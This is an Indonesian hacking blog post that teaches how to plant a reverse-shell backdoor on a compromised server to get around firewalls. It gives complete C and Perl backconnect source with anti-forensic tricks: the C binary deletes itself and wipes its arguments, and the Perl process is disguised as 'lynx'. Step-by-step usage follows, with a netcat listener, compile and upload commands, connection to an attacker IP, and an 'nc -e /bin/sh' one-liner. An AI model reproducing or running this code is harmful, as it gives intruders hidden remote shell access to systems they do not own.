» » » [BACKDOOR] BACKCONNECT
, Edit

[BACKDOOR] BACKCONNECT


backConnect biasanya di pake untuk server yg tertutup proxy or firewall sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke kompi hacker.

lebih jelasnya :
BindShell :
[SERVER - listening ] <=====[connect]====== [HACKER - remote connect]
klo keadaaanya gini :
[SERVER - listening ] [firewall] X <=====[refushed]====== [HACKER - remote connect]
maka pakai backconnect
BackConnect :
[SERVER - backconnect] ======[connect]=====> [HACKER - listening]

ok. jelas? apa belas? langsong aja yah. ada 2 script pula.
1. backconnect.c

Code:
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in sin;
char rms[21]="rm -f "; 
daemon(1,0);
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]); 
bzero(argv[1],strlen(argv[1])+1+strlen(argv[2])); 
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 
if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
   perror("[-] connect()");
   exit(0);
}
strcat(rms, argv[0]);
system(rms);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl("/bin/sh","sh -i", NULL);
close(fd); 
}


2. backconnect.pl

Code:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Seeppp.. Tinggal pilih aja. mana yg km suka n sesuai ama kondisi shell. klo perl on disarankan pakai backconnect.pl.

cara pakainya :
1. Set listening port di kompi local. pakai netcat.

nc -vlp [port]

misal: nc -vlp 3536

2. backconnect dari shell
yang jelas, y upload bindshell.c or bindshell.pl ke shell km.terserah mo wget, upload langsung, create file, dll. yg penting neh file musti ada di shell.

#pakai bindshell.c

gcc -o bindshell bindshell.c
chmod 777 bindshell
./bindshell [ip.address.kamu] [port]

misal: ./bindshell 202.212.222.223 3536
wait connected. setelah connect, y terserah elu mo apa.
#pakai bindshell.pl
perl bindshell.pl [ip.address.kamu] [port]
misal: perl bindshell.pl 202.212.222.223 3536
wait connected. setelah connect, y suka2 elu deh. mo disconnect lg jg gpp. Ngakak
OK. OK. mudah banget kan.

cara umum untuk backconnect y pakai netcat.

nc -vv 202.212.222.223 3536 -e /bin/sh

Selamat Mencoba yoo.. :)

3 Responses to "[BACKDOOR] BACKCONNECT"

Subscribe to: Post Comments (Atom)